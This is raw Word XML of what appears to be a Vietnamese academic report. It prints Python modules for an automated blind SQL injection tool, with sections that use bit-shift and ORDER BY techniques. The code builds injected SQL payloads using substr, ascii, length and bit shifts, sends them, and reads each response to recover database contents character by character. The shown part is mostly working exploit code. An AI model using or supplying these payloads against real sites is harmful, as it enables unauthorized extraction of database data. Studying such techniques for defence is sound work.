              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>imid</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">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imax </w:t>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r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>if(imax == 0):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>self.logger.info("Character not found!")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>exit()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:lastRenderedPageBreak/>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t>self.logger.info("Found character number {0} is: {1}".format(i+1, chr(temp)))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">self.result </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>+=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>chr(temp)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># Second get result</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>def checkQuery(self, payload):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># Return true/false of query</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># If contain, return True, if not, return False</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># Or use regex</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if(r.text.find(self.basicOptions["PATTERN"]["currentSetting"]) &gt; 0):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>return True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return False</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">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p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># # Equal payload</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve"># equalPayload </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>" and length({0})={1}".format(query, imid)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># if(self.checkQuery(equalPayload) == True):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># If found key</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">self.resultLength </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>imid</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>return imid</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
              <w:rPr>
                <w:szCs w:val="28"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="161" w:name="_Toc459374366"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Module Blind SQL injection sử dụng phép dịch bit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="161"/>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lastRenderedPageBreak/>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bit shift"</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self.maxLength </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>255</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 xml:space="preserve">self.basicOptions["PATTERN"] </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>"currentSetting"</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>None,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>"required"</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>True,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>"description"</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>"Pattern to check True/False"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>}</w:t>
            </w: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tmp </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>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for i in reversed(range(0, 7)):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>if(self.checkQuery("and (((length({0})&gt;&gt;{1}) mod 2)=1)".format(query, i))):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># bit i is 1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>self.logger.debug("Bit {0} is 1".format(i))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">tmp </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>tmp + pow(2,i)</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self.logger.debug("Bit {0} is 0".format(i))</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tmp</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lastRenderedPageBreak/>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 Bit shift</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 Single character</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">tmp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r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>for j in reversed(range(0, 7)):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>if(self.checkQuery(" and (((ascii(substr({0},{1},1))&gt;&gt;{2}) mod 2)=1)".format(query, (i+1),j)) == True):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self.logger.debug("Bit {0} is 1".format(j))</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tmp </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>tmp + pow(2,j)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">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self.logger.debug("Bit {0} is 0".format(j))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>self.logger.info("Found character number {0} is: {1}".format(i+1, chr(tmp)))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">self.result </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>+=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>chr(tmp)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># Second get result</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>def checkQuery(self, payload):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># Return true/false of query</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># If contain, return True, if not, return False</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># Or use regex</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if(r.text.find(self.basicOptions["PATTERN"]["currentSetting"]) &gt; 0):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>return True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return False</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:lastRenderedPageBreak/>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tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="162" w:name="_Toc459374367"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Module Blind SQL injection sử dụng Order by</w:t>
      </w:r>
      <w:bookmarkEnd w:id="162"/>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order by"</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self.standard_dict = {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>1:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>'Nguyen Van A',</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>2:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>'Tran Van B',</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>3:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>'Le Thi C',</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>4:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>'Le Thanh D',</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
